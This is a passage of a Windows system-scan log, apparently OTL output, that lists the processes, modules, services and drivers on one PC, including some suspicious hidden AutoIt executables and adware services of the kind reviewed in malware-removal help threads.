PRC - [2014/04/11 19:45:50 | 001,764,992 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2014/04/11 19:45:42 | 001,390,720 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/01/23 18:12:52 | 000,091,936 | ---- | M] (PureLeads) -- C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe
PRC - [2014/01/23 18:12:52 | 000,083,232 | ---- | M] (PureLeads) -- C:\Program Files (x86)\PureLeads\PureLeadsTray.exe
PRC - [2014/01/23 18:12:50 | 000,024,352 | ---- | M] (sendori) -- C:\Program Files (x86)\PureLeads\PureLeads.Service.exe
PRC - [2013/12/30 16:52:28 | 000,936,960 | -HS- | M] (AutoIt Team) -- C:\Users\COCHRAN\d5g5rz7tw8n\SXuWc.exe
PRC - [2013/12/30 16:52:28 | 000,936,960 | -HS- | M] (AutoIt Team) -- C:\Users\COCHRAN\kr2759867s7\jfIajrjGCA.exe
PRC - [2013/11/20 16:43:26 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
PRC - [2013/11/20 16:43:14 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
PRC - [2013/11/01 10:22:46 | 000,059,720 | ---- | M] (Apple Inc.) -- C:\Program Files (x86)\Common Files\Apple\Internet Services\APSDaemon.exe
PRC - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2012/12/18 14:08:28 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2012/10/16 04:39:00 | 000,646,744 | ---- | M] () -- C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
PRC - [2012/10/08 17:15:50 | 000,039,808 | ---- | M] (Wacom Technology) -- C:\Program Files\Tablet\Pen\WacomHost.exe
PRC - [2011/12/07 13:07:10 | 001,643,936 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\dlnaPlugin.exe
PRC - [2011/12/07 13:06:28 | 000,563,104 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinService.exe
PRC - [2011/12/07 13:06:26 | 001,884,064 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinRouterMonitor.exe
PRC - [2011/12/07 13:06:24 | 007,029,664 | ---- | M] (Affinegy, Inc.) -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinSetup.exe
PRC - [2010/11/20 22:24:03 | 001,169,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PRC - [2010/11/20 22:23:54 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PRC - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe
PRC - [2010/03/25 14:39:22 | 000,490,280 | ---- | M] (Nero AG) -- C:\Program Files (x86)\Nero\Update\NASvc.exe
PRC - [2009/03/05 16:07:20 | 002,260,480 | RHS- | M] (Safer-Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2009/01/26 15:31:10 | 001,153,368 | ---- | M] (Safer Networking Ltd.) -- C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
PRC - [2008/06/10 19:04:58 | 000,689,456 | ---- | M] (Hewlett-Packard) -- C:\Program Files (x86)\HP\HP Software Update\HPWUCli.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/06/15 12:57:39 | 000,007,168 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\hashobjs_ext.pyd
MOD - [2014/06/15 12:57:38 | 000,027,136 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_multiprocessing.pyd
MOD - [2014/06/15 12:57:37 | 001,160,704 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_ssl.pyd
MOD - [2014/06/15 12:57:37 | 000,811,008 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._windows_.pyd
MOD - [2014/06/15 12:57:37 | 000,805,888 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._gdi_.pyd
MOD - [2014/06/15 12:57:37 | 000,713,216 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_hashlib.pyd
MOD - [2014/06/15 12:57:37 | 000,110,080 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\pywintypes27.dll
MOD - [2014/06/15 12:57:36 | 000,070,656 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._html2.pyd
MOD - [2014/06/15 12:57:36 | 000,025,600 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32pdh.pyd
MOD - [2014/06/15 12:57:36 | 000,024,064 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32pipe.pyd
MOD - [2014/06/15 12:57:35 | 001,062,400 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._controls_.pyd
MOD - [2014/06/15 12:57:35 | 000,686,080 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\unicodedata.pyd
MOD - [2014/06/15 12:57:35 | 000,038,912 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32inet.pyd
MOD - [2014/06/15 12:57:35 | 000,018,432 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32event.pyd
MOD - [2014/06/15 12:57:35 | 000,010,240 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\select.pyd
MOD - [2014/06/15 12:57:34 | 000,127,488 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\pyexpat.pyd
MOD - [2014/06/15 12:57:34 | 000,119,808 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32file.pyd
MOD - [2014/06/15 12:57:34 | 000,108,544 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32security.pyd
MOD - [2014/06/15 12:57:34 | 000,017,408 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32profile.pyd
MOD - [2014/06/15 12:57:32 | 000,525,640 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\windows._lib_cacheinvalidation.pyd
MOD - [2014/06/15 12:57:31 | 000,167,936 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32gui.pyd
MOD - [2014/06/15 12:57:31 | 000,128,512 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_elementtree.pyd
MOD - [2014/06/15 12:57:31 | 000,087,552 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_ctypes.pyd
MOD - [2014/06/15 12:57:30 | 000,557,056 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\pysqlite2._sqlite.pyd
MOD - [2014/06/15 12:57:30 | 000,320,512 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32com.shell.shell.pyd
MOD - [2014/06/15 12:57:30 | 000,098,816 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32api.pyd
MOD - [2014/06/15 12:57:30 | 000,045,568 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\_socket.pyd
MOD - [2014/06/15 12:57:30 | 000,022,528 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32ts.pyd
MOD - [2014/06/15 12:57:29 | 001,175,040 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._core_.pyd
MOD - [2014/06/15 12:57:29 | 000,735,232 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._misc_.pyd
MOD - [2014/06/15 12:57:29 | 000,364,544 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\pythoncom27.dll
MOD - [2014/06/15 12:57:29 | 000,078,336 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._animate.pyd
MOD - [2014/06/15 12:57:29 | 000,011,264 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32crypt.pyd
MOD - [2014/06/15 12:57:28 | 000,122,368 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\wx._wizard.pyd
MOD - [2014/06/15 12:57:27 | 000,035,840 | ---- | M] () -- C:\Users\COCHRAN\AppData\Local\Temp\_MEI46642\win32process.pyd
MOD - [2014/06/13 04:57:06 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\8bc548587e91ecf0552a40e47bbf99cc\System.Windows.Forms.ni.dll
MOD - [2014/06/13 04:56:59 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5c24d3b0041ebf4f48a93615b9fa3de9\System.Drawing.ni.dll
MOD - [2014/06/13 04:56:35 | 007,989,760 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll
MOD - [2014/06/13 04:56:26 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll
MOD - [2014/05/29 12:37:34 | 002,139,840 | ---- | M] () -- C:\Program Files (x86)\Steam\video.dll
MOD - [2014/05/29 12:36:54 | 001,116,864 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\chromehtml.dll
MOD - [2014/05/16 20:36:10 | 000,756,224 | ---- | M] () -- C:\Program Files (x86)\Steam\SDL2.dll
MOD - [2014/05/14 05:27:52 | 016,361,136 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll
MOD - [2014/05/11 22:26:29 | 003,839,088 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2014/05/01 18:35:22 | 020,628,160 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\libcef.dll
MOD - [2014/04/29 19:08:08 | 001,135,104 | ---- | M] () -- C:\Program Files (x86)\Steam\libavcodec-55.dll
MOD - [2014/04/29 19:08:08 | 000,471,552 | ---- | M] () -- C:\Program Files (x86)\Steam\libavutil-53.dll
MOD - [2014/04/29 19:08:08 | 000,404,992 | ---- | M] () -- C:\Program Files (x86)\Steam\libavformat-55.dll
MOD - [2014/04/29 19:08:08 | 000,340,992 | ---- | M] () -- C:\Program Files (x86)\Steam\libavresample-1.dll
MOD - [2014/04/28 19:37:22 | 000,519,168 | ---- | M] () -- C:\Program Files (x86)\Steam\libswscale-2.dll
MOD - [2014/02/12 21:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/02/12 21:58:10 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2013/09/14 02:51:02 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
MOD - [2013/09/14 02:50:36 | 001,242,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
MOD - [2013/06/14 18:49:12 | 001,100,800 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avcodec-53.dll
MOD - [2013/06/14 18:49:12 | 000,192,000 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avformat-53.dll
MOD - [2013/06/14 18:49:12 | 000,124,416 | ---- | M] () -- C:\Program Files (x86)\Steam\bin\avutil-51.dll
MOD - [2012/10/16 04:39:00 | 000,646,744 | ---- | M] () -- C:\Program Files (x86)\Bamboo Dock\BambooCore.exe
MOD - [2011/12/07 13:06:32 | 000,022,944 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinServicePS.dll
MOD - [2011/12/07 12:29:02 | 000,669,184 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\gateways\GenericBelkinGatewayLOC.dll
MOD - [2010/08/22 20:01:36 | 007,187,456 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtGui4.dll
MOD - [2010/08/22 20:01:08 | 000,325,632 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtXml4.dll
MOD - [2010/08/22 20:01:06 | 001,954,304 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtCore4.dll
MOD - [2010/08/22 20:01:06 | 000,847,360 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\QtNetwork4.dll
MOD - [2010/08/22 19:32:34 | 000,119,808 | ---- | M] () -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\imageformats\qjpeg4.dll
MOD - [2010/03/10 13:00:00 | 003,565,056 | ---- | M] () -- C:\Windows\SysWOW64\vscodecpack_173\general\ffdshow\ffdshow.ax
MOD - [2009/08/14 13:03:16 | 000,694,272 | ---- | M] () -- C:\Program Files (x86)\HP\Digital Imaging\bin\FWUpdateEDO.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/06/15 03:03:56 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/03/11 12:34:10 | 000,347,872 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/03/11 12:34:10 | 000,023,808 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/09/06 12:32:06 | 000,288,776 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe -- (McComponentHostService)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/12/11 14:07:04 | 000,619,904 | ---- | M] (Wacom Technology, Corp.) [Auto | Running] -- C:\Program Files\Tablet\Pen\WTabletServiceCon.exe -- (WTabletServiceCon)
SRV:64bit: - [2011/07/12 20:52:12 | 000,027,760 | ---- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:64bit: - [2011/04/19 16:31:16 | 000,181,760 | ---- | M] () [Auto | Running] -- C:\Program Files\Belkin\Belkin USB Print and Storage Center\BkBackupScheduler.exe -- (Belkin Local Backup Service)
SRV:64bit: - [2010/05/20 15:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2010/02/09 15:55:52 | 000,055,296 | ---- | M] () [Auto | Running] -- C:\Program Files\Belkin\Belkin USB Print and Storage Center\Bkapcs.exe -- (Belkin Network USB Helper)
SRV - [2014/05/29 12:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/05/14 05:27:59 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/13 14:23:04 | 003,644,432 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Running] -- C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe -- (AVGIDSAgent)
SRV - [2014/05/13 14:15:28 | 000,292,424 | ---- | M] (AVG Technologies CZ, s.r.o.) [Auto | Running] -- C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe -- (avgwd)
SRV - [2014/05/11 22:26:55 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/04/11 19:45:50 | 001,764,992 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/04/11 19:45:42 | 001,390,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/01/23 18:12:52 | 000,091,936 | ---- | M] (PureLeads) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeadsSvc.exe -- (PlsvcV1)
SRV - [2014/01/23 18:12:50 | 000,024,352 | ---- | M] (sendori) [Auto | Running] -- C:\Program Files (x86)\PureLeads\PureLeads.Service.exe -- (PlsvcV2)
SRV - [2013/10/23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2013/02/26 00:32:22 | 001,260,320 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2013/01/18 08:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012/12/18 14:08:28 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012/09/12 20:14:21 | 000,131,912 | ---- | M] (Desura Pty Ltd) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Desura\desura_service.exe -- (Desura Install Service)
SRV - [2011/12/07 13:06:28 | 000,563,104 | ---- | M] (Affinegy, Inc.) [Auto | Running] -- C:\Program Files (x86)\Belkin\Router Setup and Monitor\BelkinService.exe -- (AffinegyService)
SRV - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) [Auto | Running] -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe -- (RtlService)
SRV - [2010/04/16 16:10:58 | 000,036,864 | ---- | M] (Realtek) [Auto | Running] -- C:\Program Files (x86)\REALTEK\11n USB Wireless LAN Utility\RtlService.exe -- (Realtek11nCU)
SRV - [2010/03/25 14:39:22 | 000,490,280 | ---- | M] (Nero AG) [Auto | Running] -- C:\Program Files (x86)\Nero\Update\NASvc.exe -- (NAUpdate)
SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard)
SRV - [2009/06/10 16:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2009/05/21 22:35:32 | 000,923,136 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/05/13 14:20:26 | 000,235,800 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgldx64.sys -- (Avgldx64)
DRV:64bit: - [2014/05/13 14:20:06 | 000,273,176 | ---- | M] (AVG Technologies CZ, s.r.o.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtdia.sys -- (Avgtdia)
DRV:64bit: - [2014/05/13 14:06:06 | 000,323,352 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgloga.sys -- (Avgloga)
DRV:64bit: - [2014/05/13 14:05:40 | 000,191,768 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgidsha.sys -- (AVGIDSHA)
DRV:64bit: - [2014/05/13 14:05:08 | 000,152,344 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgdiska.sys -- (Avgdiska)
DRV:64bit: - [2014/05/13 14:05:06 | 000,130,328 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgmfx64.sys -- (Avgmfx64)
DRV:64bit: - [2014/05/13 14:04:56 | 000,236,312 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\avgidsdrivera.sys -- (AVGIDSDriver)
DRV:64bit: - [2014/05/13 14:04:30 | 000,031,512 | ---- | M] (AVG Technologies CZ, s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\avgrkx64.sys -- (Avgrkx64)
DRV:64bit: - [2014/04/27 17:21:47 | 000,050,464 | ---- | M] (AVG Technologies) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\avgtpx64.sys -- (avgtp)
DRV:64bit: - [2014/04/18 16:41:51 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2014/03/30 01:26:02 | 000,129,944 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu)
DRV:64bit: - [2014/03/11 09:52:30 | 000,133,928 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2013/03/18 17:51:08 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2013/02/12 15:51:52 | 000,042,184 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\hssdrv6.sys -- (HssDRV6)
DRV:64bit: - [2013/01/10 14:44:02 | 000,042,184 | ---- | M] (Anchorfree Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\taphss6.sys -- (taphss6)
DRV:64bit: - [2012/12/03 17:36:34 | 000,081,824 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wachidrouter.sys -- (WacHidRouter)
DRV:64bit: - [2012/12/03 17:36:34 | 000,013,728 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidkmdf.sys -- (hidkmdf)
DRV:64bit: - [2012/11/26 20:31:40 | 000,111,696 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NIWinCDEmu.sys -- (NIWinCDEmu)
DRV:64bit: - [2012/11/15 10:41:06 | 000,015,776 | ---- | M] (Wacom Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wacomrouterfilter.sys -- (wacomrouterfilter)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/05/12 12:31:00 | 000,121,416 | ---- | M] (MotioninJoy) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MijXfilt.sys -- (MotioninJoyXFilter)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/12/07 19:42:28 | 000,074,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2011/11/03 03:01:00 | 000,056,208 | ---- | M] (Rovi Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:64bit: - [2011/07/12 20:52:06 | 002,165,360 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:64bit: - [2011/06/10 01:34:52 | 000,539,240 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2011/05/10 04:41:27 | 000,174,184 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/02/11 09:36:12 | 000,848,384 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RTL8192cu.sys -- (RTL8192cu)
DRV:64bit: - [2010/12/15 10:06:46 | 000,047,232 | R--- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbfilter.sys -- (usbfilter)
DRV:64bit: - [2010/11/20 22:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/06/29 16:01:04 | 000,011,832 | ---- | M] (Advanced Micro Devices Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdide64.sys -- (amdide64)
DRV:64bit: - [2010/06/21 17:56:20 | 000,027,240 | ---- | M] (Realtek Semiconductor Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rtlss.sys -- (rtlss)
DRV:64bit: - [2010/01/29 01:04:38 | 000,036,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\nx6000.sys -- (MSHUSBVideo)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/22 16:50:00 | 000,291,352 | ---- | M] (silex technology, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sxuptp.sys -- (sxuptp)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
